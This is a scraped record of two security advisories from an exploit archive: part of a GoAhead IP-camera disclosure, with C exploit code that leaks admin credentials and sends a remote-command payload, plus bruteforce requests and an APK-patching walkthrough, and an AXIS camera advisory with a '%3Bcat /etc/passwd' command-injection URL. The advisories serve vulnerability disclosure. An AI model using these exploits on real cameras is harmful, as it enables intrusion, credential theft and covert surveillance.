reference in the binary data \nin order to to find the positions of \ncredentials \n... \n... \n0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin........... \n00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin........... \n00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ \n... \n \nNOTE: reference can be too: \n000????: 0006 0606 0606 0100 000a .... .... .... \n \nOther method: parse everything, find the \"admin\" string and extract \nthe associated password \nby adding 31bytes after the address of 'a'[dmin]. \nWorks if the login is admin (seems to be this by default, but can be \nchanged by the user) \n*/ \n \nif (get_config) \n{ \nfor (unsigned int j = 0; j < n_total && j < 10 * 1024; j++) \nprintf(\"%c\", tmp[j]); \nexit (0); \n} \n \n \nfor (unsigned int j = 50; j < 10 * 1024; j++) \n{ \nif (tmp[j - 4] == 0x0a && \ntmp[j - 3] == 0x0a && \ntmp[j - 2] == 0x0a && \ntmp[j - 1] == 0x0a && \ntmp[j] == 0x01) \n{ \nif (j + 170 < 10 * 1024) \n{ \nstrcat(out, &tmp[j + 138]); \nstrcat(out + 32 * sizeof(char), &tmp[j + 170]); \nfree(tmp); \n \nreturn (out); \n} \n} \n} \n \nfree(tmp); \n \nreturn (NULL); \n} \n \nint rce(char *argv, \nchar *id, \nchar attack[], \nchar desc[]) \n{ \nint sock; \nstruct sockaddr_in serv_addr; \nchar *payload; \n \nif (!(payload = calloc(512, sizeof(char)))) \nreturn (1); \n \nsock = 0; \n \nprintf(\"[+] %s payload ... \", desc); \n \nif ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) \n{ \nprintf(\"Error while creating socket\\n\"); \nreturn (1); \n} \n \nmemset(&serv_addr, '0', sizeof(serv_addr)); \nserv_addr.sin_family = AF_INET; \nserv_addr.sin_port = htons(CAM_PORT); \n \nif (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0) \n{ \nprintf(\"Error while inet_pton\\n\"); \nreturn (1); \n} \n \nif (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0) \n{ \nprintf(\"rce: connect failed\\n\"); \nreturn (1); \n} \n \n \nsprintf(payload, attack, id, id + 32); \nif (send(sock, payload, strlen(payload) , 0) < 0) \n{ \nprintf(\"rce: send failed\\n\"); \nreturn (1); \n} \n \nreturn (0); \n} \n \nAlternatively, you can fetch it at \nhttps://pierrekim.github.io/advisories/expl-goahead-camera.c. \n \n \n \n## Details -- Misc - Streaming without authentication \n \nAn attacker can use the authenticated-less RTSP server running on the \ncamera on port `10554/tcp` to watch the streaming without \nauthentication. \n \nuser@kali$ vlc rstp://192.168.1.107:10554/tcp/av0_1 \n \nAnd: \n \nuser@kali$ vlc rstp://192.168.1.107:10554/tcp/av0_0 \n \n \n \n## Details -- Misc - \"Cloud\" (Aka Botnet) \n \nBy default, the camera uses a 'Cloud' functionality. \n \nYou can tcpdump the traffic of the camera, which is very scary: \n \n12:09:21.410947 IP 192.168.1.107.46958 > 8.8.8.8.53: 60806+ A? \nopenapi.xg.qq.com.gateway. (43) \n12:09:26.429697 IP 192.168.1.107.58156 > 202.96.134.33.53: 60806+ \nA? openapi.xg.qq.com.gateway. (43) \n12:09:31.450033 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? \nwww.baidu.com. (31) \n12:09:35.128919 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48 \n12:09:35.128932 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48 \n12:09:35.128933 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48 \n12:09:36.468849 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ \nA? www.baidu.com. (31) \n12:09:41.488223 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? \nwww.baidu.com. (31) \n12:09:46.507810 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ \nA? www.baidu.com. (31) \n12:09:51.527501 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? \nwww.baidu.com.gateway. (39) \n12:09:56.546854 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ \nA? www.baidu.com.gateway. (39) \n12:10:01.566316 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? \nwww.baidu.com.gateway. (39) \n12:10:06.575735 ARP, Request who-has 192.168.1.1 tell \n192.168.1.107, length 46 \n12:10:06.575750 ARP, Reply 192.168.1.1 is-at 00:e0:4c:51:55:ed, length 28 \n12:10:06.585841 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ \nA? www.baidu.com.gateway. (39) \n12:10:11.606030 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? \ntime.nist.gov. (31) \n12:10:16.625044 IP 192.168.1.107.44109 > 202.96.134.33.53: 41046+ \nA? time.nist.gov. (31) \n12:10:19.214687 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48 \n12:10:19.214700 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48 \n12:10:19.214702 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48 \n12:10:21.644397 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? \ntime.nist.gov. (31) \n \n \nThe camera tries to resolve `www.baidu.com`, `openapi.xg.qq.com`, \ncontacts hardcoded IPs and hosts: \n \n- - `121.42.208.86:32100/udp` (CN: Alibaba), \n- - `54.221.213.97:32100/udp` (AWS US), \n- - `120.24.37.48:32100/udp` (CN: Alibaba), \n- - `www.baidu.com:80/tcp` (CN: Baidu). \n \nIt appears this is the 'Cloud' functionality, enabled by default. The \nsecurity of this functionality is not proven. \n \n \nThe provided Android application to manage my camera is \nobject.p2pwificam.client.apk \n[https://play.google.com/store/apps/details?id=object.p2pwificam.client]. \n \n[please visit the HTML version at \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nto see the image] \n \nNetcam 360 works too: \n \n[please visit the HTML version at \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nto see the image] \n \nIt appears, the network protocol is very weak: \n \n1. the camera contacts a remote server using UDP, \n2. the application contacts a remote server using UDP, \n3. the application sends a request to the remote server, asking if the \ncamera with the specific serial-number is online, \n4. the server will reply by \"camera doesn't exit\", \"camera is offline\" \nor \"camera is online\", \n5. if the camera is online, a UDP tunnel is automaticaly established \nbetween the application and the camera, using the Cloud server as a \nrelay. \n \n \n### UDP tunnel: \n \n[Android Application] <===UDP===> Cloud server <===UDP===> [Camera] \n \n \nThen, the UDP tunnel is used by the application to reach the camera: \n \n1/ the client will send a HTTP request to the camera with the \ncredentials (still in clear-text) \n \nGET check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin& \n \nor \n \nGET /check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin& \n \n \n2/ the camera will reply by using HTTP over UDP whenever the \ncredentials are valid or invalid. \n \nIf the credentials are valid, the camera will reply: \n \nresult= 0; \n \nIf the credentials are not valid, the camera will reply: \n \nresult=-1 \n \n \n3/ if the credentials are valid, then the application will send HTTP \nrequests to .cgi files hosted by the camera by appending credentials \nto the requests (`?loginuse=valid_user&loginpas=valid_pass`) \n \n \n \n \n### Step 2 in detail: \n \nIf the authentication is OK, so it is alright to dump all the \nconfiguration in cleartext! \n \n \n[please visit the HTML version at \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nto see the image] \n \n \nNote: this trace was done with one of the application listed below, to \nbe sure applications are sharing the same \"cloud\" network (it appears \nthe daemon running on the camera doesn't strictly respect the HTTP \nprotocol - note the lack of `/` - but it works !). \n \n \nIf the authentication is not OK. The cameras answers: \n \nresult=-1; \n \nDue to the absence of checking, an attacker can simply bruteforce credentials. \n \n[please visit the HTML version at \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nto see the image] \n \n \n \n### Step 3 in detail: \n \nThe application sends: \n \nGET get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin& \n \nOR \n \nGET /get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin& \n \n \n \nThe camera replies by sending all its configuration in clear-text: \n \n \nvar now=1122211111; \nvar dst_enable=0; \nvar dst_time=0; \nvar tz=0; \nvar ntp_enable=1; \nvar ntp_svr=\"time.nist.gov\"; \nvar dhcpen=1; \nvar ip=\"192.168.2.76\"; \nvar mask=\"255.255.255.0\"; \nvar gateway=\"192.168.2.1\"; \nvar dns1=\"8.8.8.8\"; \nvar dns2=\"192.168.2.1\"; \nvar port=80; \nvar nashost=\"\"; \nvar nasport=0; \nvar dev2_host=\"\"; \nvar dev2_alias=\"\"; \nvar dev2_user=\"\"; \nvar dev2_pwd=\"\"; \nvar dev2_port=0; \nvar dev3_host=\"\"; \nvar dev3_alias=\"\"; \nvar dev3_user=\"\"; \nvar dev3_pwd=\"\"; \nvar dev3_port=0; \nvar dev4_host=\"\"; \nvar dev4_alias=\"\"; \nvar dev4_user=\"\"; \nvar dev4_pwd=\"\"; \nvar dev4_port=0; \nvar dev5_host=\"\"; \nvar dev5_alias=\"\"; \nvar dev5_user=\"\"; \nvar dev5_pwd=\"\"; \nvar dev5_port=0; \nvar dev6_host=\"\"; \nvar dev6_alias \n[...] \nvar user1_name=\"\"; \nvar user1_pwd=\"\"; \nvar user2_name=\"wut\"; \nvar user2_pwd=\"wut\"; \nvar user3_name=\"admin\"; \nvar user3_pwd=\"admin\"; \n[...] \n \n \n \n \n \n \n \n \n \nThis is interesting because an attacker can reach a camera only by \nknowing a serial number. The UDP tunnel between the attacker and the \ncamera is established even if the attacker doesn't know the \ncredentials. It's useful to note the tunnel bypasses NAT and firewall, \nallowing the attacker to reach internal cameras (if they are connected \nto the Internet) and to bruteforce credentials. \nThen, the attacker can just try to bruteforce credentials of the camera: \n \nGET /get_params.cgi?&loginuse=admin&loginpas=TEST&user=admin&pwd=TEST& \n \n \n \n \nThis protocol appears to be common to a lot of Android applications, ie: \n \n- - object.p2pwificam.client \n(https://play.google.com/store/apps/details?id=object.p2pwificam.client) \n(500.000 - 1.000.000 installations) \n- - hsl.p2pipcam \n(https://play.google.com/store/apps/details?id=hsl.p2pipcam) (100.000 \n- 500.000 installations) \n- - object.liouzx.client \n(https://play.google.com/store/apps/details?id=object.liouzx.client) \n(100.000 - 500.000 installations) \n- - object.lioupp.client \n(https://play.google.com/store/apps/details?id=object.lioupp.client) \n(100.000 - 500.000 installations) \n- - com.g_zhang.myp2pcam \n(https://play.google.com/store/apps/details?id=com.g_zhang.myp2pcam) \n(100.000 - 500.000 installations) \n- - object.aisaidezx.client \n(https://play.google.com/store/apps/details?id=object.aisaidezx.client) \n(50.000 - 100.000 installations) \n- - hsl.cam360 (https://play.google.com/store/apps/details?id=hsl.cam360) \n(10.000 - 50.000 installations) \n- - bravocam.p2pipcam \n(https://play.google.com/store/apps/details?id=bravocam.p2pipcam) \n(10.000 - 50.000 installations) \n- - xcam.p2pipcam \n(https://play.google.com/store/apps/details?id=xcam.p2pipcam) (10.000 \n- 50.000 installations) \n- - snugcam.p2pipcam \n(https://play.google.com/store/apps/details?id=snugcam.p2pipcam) \n(10.000 - 50.000 installations) \n- - myview.p2pipcam \n(https://play.google.com/store/apps/details?id=myview.p2pipcam) (5.000 \n- 10.000 installations) \n- - object.weimaisizx.client \n(https://play.google.com/store/apps/details?id=object.weimaisizx.client) \n(10.000 - 50.000 installations) \n- - com.tutk.P2PCamLive.Pixord \n(https://play.google.com/store/apps/details?id=com.tutk.P2PCamLive.Pixord) \n(10.000 - 50.000 installations) \n- - object.p2pnetwork.client \n(https://play.google.com/store/apps/details?id=object.p2pnetwork.client) \n(5.000 - 10.000 installations) \n \nThis list is very far from being complete. \n \n \n \n \nSo, I modified the original Android Application in order to try the \npre-auth Info-Leak vulnerability: \n \n \n \nk% ls -la \ntotal 14912 \ndrwx------ 2 nobody nogroup 100 Mar 7 08:27 . \ndrwxrwxrwt 3 root root 140 Mar 7 08:25 .. \n-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool \n-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar \n-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 \nobject.p2pwificam.client.apk \nk% ./apktool d object.p2pwificam.client.apk \nI: Using Apktool 2.2.2 on object.p2pwificam.client.apk \nI: Loading resource table... \nI: Decoding AndroidManifest.xml with resources... \nS: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead... \nS: Please be aware this is a volatile directory and frameworks \ncould go missing, please utilize --frame-path if the default storage \ndirectory is unavailable \nI: Loading resource table from file: \n/tmp/.local/share/apktool/framework/1.apk \nI: Regular manifest package... \nI: Decoding file-resources... \nI: Decoding values */* XMLs... \nI: Baksmaling classes.dex... \nI: Copying assets and libs... \nI: Copying unknown files... \nI: Copying original files... \nk% \n \n \nI edit the library which manages all the custom HTTP requests. \n \nOne of the interesting string is `GET \n/%sloginuse=%s&loginpas=%s&user=%s&pwd=%s`: \n \nk% xxd ./object.p2pwificam.client/lib/armeabi/libobject_jni.so \n \n0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET \n0001f660: 2f25 736c 6f67 696e 7573 653d 2573 266c /%sloginuse=%s&l \n0001f670: 6f67 696e 7061 733d 2573 2675 7365 723d oginpas=%s&user= \n0001f680: 2573 2670 7764 3d25 7326 0000 4449 443a %s&pwd=%s&..DID: \n0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com \n0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con \n0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect begin...%s. \n0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai \n0001f6d0: 6c65 642e 2e20 2573 2072 6574 7572 6e3a led.. %s return: \n0001f6e0: 2025 6400 5265 436f 6e6e 6563 7443 6f75 %d.ReConnectCou \n0001f6f0: 6e74 3a20 2564 0a00 5050 5050 5f43 6f6e nt: %d..PPPP_Con \n0001f700: 6e65 6374 2073 7563 6365 7373 2e2e 2e6d nect success...m \n0001f710: 5f68 5365 7373 696f 6e48 616e 646c 653a _hSessionHandle: \n \n \nAfter the modification: \n \n0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET \n0001f660: 2f73 7973 7465 6d2e 696e 693f 6c6f 6769 /system.ini?logi \n0001f670: 6e75 7365 266c 6f67 696e 7061 7373 2678 nuse&loginpass&x \n0001f680: 7878 7878 7878 7878 7826 0000 4449 443a xxxxxxxxx&..DID: \n0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com \n0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con \n0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect begin...%s. \n0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai \n \n \n \n \nThen, let's repack and sign the .apk: \n \nk% ./apktool b object.p2pwificam.client \nI: Using Apktool 2.2.2 \nI: Checking whether sources has changed... \nI: Checking whether resources has changed... \nI: Building resources... \nS: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead... \nS: Please be aware this is a volatile directory and frameworks \ncould go missing, please utilize --frame-path if the default storage \ndirectory is unavailable \nW: warning: string 'conectar' has no default translation. \nW: warning: string 'str_ipcamfour' has no default translation. \nW: warning: string 'user_pwd_no_show' has no default translation. \nI: Copying libs... (/lib) \nI: Building apk file... \nI: Copying unknown files/dir... \nk% openssl genrsa -out key.pem \n \nGenerating RSA private key, 2048 bit long modulus \n..........................................+++ \n...................................................................+++ \nunable to write 'random state' \ne is 65537 (0x010001) \nk% openssl req -new -key key.pem -out request.pem \n[...] \nk% openssl x509 -req -days 9999 -in request.pem -signkey key.pem \n-out certificate.pem \nSignature ok \nsubject=C = AU, ST = Some-State, O = Internet Widgits Pty Ltd \nGetting Private key \nunable to write 'random state' \nk% openssl pkcs8 -topk8 -outform DER -in key.pem -inform PEM -out \nkey.pk8 -nocrypt \nk% signapk certificate.pem key.pk8 \nobject.p2pwificam.client/dist/object.p2pwificam.client.apk \nsigned-object.p2pwificam.client.apk \nk% ls -latr \ntotal 21560 \ndrwxrwxrwt 3 root root 140 Mar 7 08:25 .. \n-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar \n-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool \n-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 \nobject.p2pwificam.client.apk \ndrwx------ 9 nobody nogroup 220 Mar 7 08:33 object.p2pwificam.client \n-rw------- 1 nobody nogroup 1675 Mar 7 08:33 key.pem \n-rw------- 1 nobody nogroup 956 Mar 7 08:33 request.pem \n-rw------- 1 nobody nogroup 1111 Mar 7 08:33 certificate.pem \n-rw------- 1 nobody nogroup 1217 Mar 7 08:33 key.pk8 \ndrwx------ 3 nobody nogroup 220 Mar 7 08:34 . \n-rw------- 1 nobody nogroup 6787146 Mar 7 08:34 \nsigned-object.p2pwificam.client.apk \n \n \n`signed-object.p2pwificam.client.apk` is ready to be used. \n \n \nWhen using it, we see that: \n \n \nThe client indeed sends the `system.ini` request within the UDP tunnel: \n \n[please visit the HTML version at \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nto see the image] \n \n \n \nThe camera indeed receives this request within the UDP tunnel: \n \n[please visit the HTML version at \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nto see the image] \n \n \n \nComplete trace is: \n \n[please visit the HTML version at \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nto see the image] \n \n \nIt appears the pre-auth is not easily reachable within the cloud network. \n \nThis \"cloud\" protocol seems to be more a botnet protocol than a legit \nremote access protocol and has indeed weakness (everything in \nclear-text, i.e. an attacker can attack cameras within the cloud and \nleverage potential access to hack internal networks). \n \nA lot of P2P ('Cloud') cameras are in fact using the same botnet \nprotocols and the same infrastructure seemingly to be managed by a \nsingle entity. \n \nWriting a PoC which bruteforces credentials of the remote camera is \nleft as an exercise for the reader. \n \n \n \n## Vendor Response \n \nDue to difficulties in finding and contacting all the vendors, \nfull-disclosure is applied. \n \nI advise to IMMEDIATELY DISCONNECT cameras to the Internet. Hundreds \nof thousands cameras are affected by the 0day Info-Leak. Millions of \nthem are using the insecure Cloud network. \n \n \n## Report Timeline \n \n* Feb 26, 2017: Vulnerabilities found by Pierre Kim. \n* Mar 08, 2017: A public advisory is sent to security mailing lists. \n \n \n \n## Credits \n \nThese vulnerabilities were found by Pierre Kim (@PierreKimSec). \n \n \n \n## References \n \nhttps://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt \n \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \n \n \n \n## Disclaimer \n \nThis advisory is licensed under a Creative Commons Attribution Non-Commercial \nShare-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/ \n \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1 \n \niQIcBAEBCgAGBQJYv2UeAAoJEMQ+Dtp9ky28neMP/18McFaGxLqBaBjsbDFynjou \nIZN/iA6FYm27lfGJ3RME9U+G0IwLzQuWshF2hGPsqmogxLRNRE5QB20Yy9P4+nyH \nVtFqZ1tN6lfZhlQCKDlGr3UdYdwpuP+fNmC11KU153d3TT1c9lWjNnVcatEPPati \nwbxJK0EwZ9T8UuzT/hweBPxRH9RDeWjWUjIBrv0+sLuwKrxkPgkE0IXKHLTLoKhy \nDR0jQd5oCN8rorm5NCPGYCttBBSv0qwy4nIsgVzIViGoaumtrnOJUuwmHzVcvU1n \noAQVY/WwU2GLjWHqamAY9n4H6FEGYd+vGAtwnbxdVXAHwlHgY34sO7wuomHXNWwL \n52Hwm+65qdBx9+iD9IPZtNoOgwPuOxp7RReEvj144EDbVptAUy62f4ilR05+XQZL \nDmBxgqBwdLLVXBOnl/f7qj4ptERID2lW5XMUw6FURxXHrfle80Sgp/Yios8E/bcW \nSyQJmAgRy3ZzQ7m4uUmIiUgAuyq2F2DA+CB7/8nkysPruw+In/Tdj5WIWTAAb8aT \nksZ05z+tGHYMXt8NlGvKLYcAmhU9Nw8X1KF4ChCuA59jy1fNjUplAyl6AemzAETB \nSknfr7lSQMGGY+GyQ1X3NxHfjAcWytpVsjb+/UOJE+Y+hHP59pRL5Smo1lOE9BWz \n0VEWlkNCYSlBtIXqVQqW \n=iiUl \n-----END PGP SIGNATURE----- \n \n \n-- \nPierre Kim \npierre.kim.sec@gmail.com \n@PierreKimSec \nhttps://pierrekim.github.io/ \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141523/2017-goahead-camera-0x00.txt"}, {"lastseen": "2016-12-05T22:13:54", "description": "", "published": "2016-07-28T00:00:00", "type": "packetstorm", "title": "AXIS Authenticated Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-8257"], "modified": "2016-07-28T00:00:00", "id": "PACKETSTORM:138083", "href": "https://packetstormsecurity.com/files/138083/AXIS-Authenticated-Remote-Command-Execution.html", "sourceData": "` _ _ _ _ _ _ _ _ _ _ \n/ \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ \n( 0 | R | W | 3 | L | L | L | 4 | 8 | 5 ) \n\\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \n \nwww.orwelllabs.com \nsecurity advisory \nolsa-2015-8257 \nPGP: 79A6CCC0 \n \n \n \n \n* Advisory Information \n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \n(+) Title: AXIS Multiple Products Authenticated Remote Command Execution \nvia devtools vector \n(+) Vendor: AXIS Communications \n(+) Research and Advisory: Orwelllabs \n(+) Advisory URL: \nhttp://www.orwelllabs.com/2016/01/axis-commucations-multiple-products.html \n(+) Class: Improper Input Validation [CWE-20] \n(+) CVE Name: CVE-2015-8257 \n(+) Remotely Exploitable: Yes \n(+) Locally Exploitable: No \n(+) OLSA-ID: OWLL2015-8257 \n(+) Affected Versions: Multiple Products/Firmwares (check the list bellow) \n(+) IoT Attack Surface: Device Administrative \nInterface/Authentication/Authorization \n(+) Owasp IoTTop10: I1, I2 \n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \n \n \n \nVulnerability \n+++++++++++++ \nAXIS Network Cameras (various models/firmwares) are prone to Authenticated \nremote \ncommand execution vulnerability. Exploiting this vulnerability a remote \nattacker can \nforce the execution of certain unauthorized actions, which may lead to \nfurther attacks. \n \nTechnical Details \n+++++++++++++++++ \nThe devtools.sh script is the responsible for vulnerability and it's 4 \nattack vectors through the following pages: \n \n \nhttp://xxx.xxx.xxx.xxx/app_license.shtml?app= \nhttp://xxx.xxx.xxx.xxx/app_license_custom.shtml?app= \nhttp://xxx.xxx.xxx.xxx/app_index.shtml?app= \nhttp://xxx.xxx.xxx.xxx/app_params.shtml?app= \n \n \nAn attacker can use the app parameter that waits for the name of a \nlegitimate application to inject commands in the operating system using \n\"%3B\", for example, to read the contents of /etc/passwd: \n \nhttp: // \nxxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd \n \nThe data entered in parameter \"app =\" is passed without any treatment for \ndevtools.sh script located at: {HTMLROOL}/bin/devtools.sh \n \nThis script contains several functions, namely: \n \nlist() \nstatus() \nmenulist() \nmainpagelink() \nSETTINGSLINK() \nconfvariable() \necho_ssivar_licensekey() \nload_auto_inst_form() \n \nWhen these functions are invoked, they interact with the parameters passed \nby the web application through \nthe affected scripts (e.g. ap_license.shtml? App =). By injecting the code \nbelow: \n \nhttp: // \nxxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd \n \nThe value passed in \"app\" will be passed directly to the script invoking \ndevtools.sh via shell -c as shown in the listing process below (third line \ninvoking confvariable function): \n \n[SNIP] \n2039 led 25472 S /usr/bin/enldgts -n \n12014 root 0 SW [kworker/0:0] \n13178 root 2548 S /bin/sh -c /usr/html/bin/devtools.sh \nconfvariable ORW.. \n13183 root 2728 R ps -aux PACKAGENAME \n13312 root 0 SW [kworker/3:1] \n13320 root 0 SW [kworker/2:0] \n[SNIP] \n \nThe value \"ORWELLLABS%3Bcat%20/etc/passwd\" is then passed on to the \ncorresponding function (after passing through a conference on \"confvariable \n()\"). \n \nconfvariable() { \nlocal val= \nif [ -r \"$PACKAGE_DIRECTORY/$1/$ADPPACKCFG\" ]; then \n. \"$PACKAGE_DIRECTORY/$1/$ADPPACKCFG\" || : \neval val=\\$$2 \necho $val \nfi \n} \n \n \nThen enter the function \"menulist ()\" which we see the main stretch located \nbetween the lines 127 and 143: \n \n[SNIP] \n127 [ \"$ name\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If \nexpr = \"\\ $ activeMenu1 = $ APPNAME\" -> true <! - # Else - -> false <! - # \nendif ->, null, \n128 [ \n129 [ \"Settings\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If \nexpr = \"\\ $ ActivePage = param_ $ APPNAME\" -> true <! - # Else - -> false \n<! - # endif ->, null, []], \n130 EOF \n131 if [-z \"$ LICENSEPAGE\"] || [ \"$ LICENSEPAGE\" axis =]; Then \n132 cat << - EOF \n133 [ \"License\", \"/app_license.shtml\", \"app = $ APPNAME &\" hostA, <! - # If \nexpr = \"\\ $ ActivePage = license_ $ APPNAME\" -> true <! - # Else - -> false \n<! - # endif ->, null, []], \n134 EOF \n135 fi \n136 if [ \"$ LICENSEPAGE\" = custom] && [-r \"$ HTMLROOT / local / $ APPNAME / \nlicense.inc\"]; Then \n137 cat << - EOF \n138 [ \"License\", \"/app_license_custom.shtml\", \"app = $ APPNAME &\" hostA, <! \n- # If expr = \"\\ $ ActivePage custom_ = $ APP NAME\" -> true <! - # Else -> \nfalse <! - # endif ->, null, []], \n139 EOF \n140 fi \n141 if [-r \"$ HTMLROOT / local / $ APPNAME / about.inc\"]; Then \n142 cat << - EOF \n143 [ \"About\", \"/app_index.shtml\", \"app = $ APPNAME &\" hostA, <! - # If \nexpr = \"\\ $ ActivePage = $ APPNAME\" -> true <! - # Else - > false <! - # \nendif ->, null, []], \n \n \nWhere the important lines are the menus below: \n \n \n/bin/devtools.sh (127): \n[ \"$ Name\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If expr \n= \"\\ $ activeMenu1 = $ APPNAME\" -> true -> false <! - #endif ->, null, \n/bin/devtools.sh (129): \n[ \"Settings\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If \nexpr = \"\\ $ ActivePage = param_ -> true <! - # Else -> false < ! - # endif \n->, null, []], \n/bin/devtools.sh (133): \n[ \"License\", \"/app_license.shtml\", \"app = $ APPNAME &\" hostA, <! - # If \nexpr = \"\\ $ ActivePage = License\" -> true <! - # Else -> false <! - # endif \n->, null, []], \n/bin/devtools.sh (138): \n[ \"License\", \"/app_license_custom.shtml\", \"app = $ APPNAME &\" hostA, <! - # \nIf expr = \"\\ $ ActivePage = APPNAME\" -> true <! - # Else -> false <! - # \nendif ->, null, []], \n/bin/devtools.sh (143): \n[ \"About\", \"/app_index.shtml\", \"app = $ APPNAME &\" hostA, <! - # If expr = \n\"\\ $ ActivePage = $ APPNAME\" - # else -> false <! - # endif ->, null, []], \n \n \nIn PoC presented above, the payload will be triggered in line vector 133 of \ndevtools script ( \"License\" menu) that will: \n \n \n[ \"License\", \"/app_license.shtml\", \"app = ORWELLLABS% 3Bcat% 20 \n/etc/passwd& \"HostA, <! - # If expr =\" \\ $ ActivePage = License \"-> true <! \n- # Else -> false <! - # Endif ->, null, []], \n \nAnd when executed echoes the results on the page. \n \n \nImpact \n++++++ \nThe impact of this vulnerability is that taking into account the busybox \nthat runs behind (and with root privileges everywhere. in all the binaries \nand scripts) is possible to execute arbitrary commands, create backdoors, \nperforming a reverse connection to the machine attacker, use this devices \nas botnets and DDoS amplification methods... the limit is the creativity of \nthe attacker. \n \n \nAffected Products \n+++++++++++++++++ \nMultiple Axis Communications Products/Firmware including: \n \n* AXIS Q6032-E/Q6034-E/Q6035-E PTZ Dome Network Camera - \nFirmware 5.41.1.4 \n* AXIS Q6042-E/Q6044-E/Q6045-E PTZ Dome Network Camera - \nFirmware 5.70.1.2 \n* AXIS A8004-VE Network Video Door Station - \nFirmware 5.85.1.1 \n* AXIS P3384 fixed dome Network camera - \nFirmware 6.10.1 \n* AXIS P5532-E PTZ Dome Network Camera - \nFirmware 5.41.3.1 \n* AXIS Q60-E Network Dome PTZ - \nFirmware 5.65.1.1, 5.41.*, 5.70.1.1 \n* AXIS Q7401 Video Encoder - \nFirmware 5.50.4 \n* AXIS Q7404 Video Encoder - \nFirmware 5.50.4.* \n* AXIS Q7406 Blade Video Encoder - \nFirmware 5.51.2 \n* AXIS Q7411 Video Encoder - \nFirmware 5.90.1 \n* AXIS Q7414 Blade Video Encoder - \nFirmware 5.51.2 \n* AXIS Q7424-R Video Encoder - \nFirmware 5.50.4 \n* AXIS Q7424-R Mk II Video Encoder - \nFirmware 5.51.3 \n* AXIS Q7436 Blade Video Encoder - \nFirmware 5.90.1 \n \n \nThe list bellow shows the firmwares affected (and probably these firmwares \nare not available anymore, but just the last version of them, if you not \nsure, check the hash). All these firmwares (in the second column) has the \nsame \"devtools.sh\" shellscript (responsible for trigger the RCE \nvulnerability) embedded. The script can be found on directory: \n\"{HTMLROOT}/bin/devtools.sh\". \n \n======================================================================== \nPRODUCT FIRMWARE FIRMWARE HASH \n======================================================================== \nAXIS A8004-VE 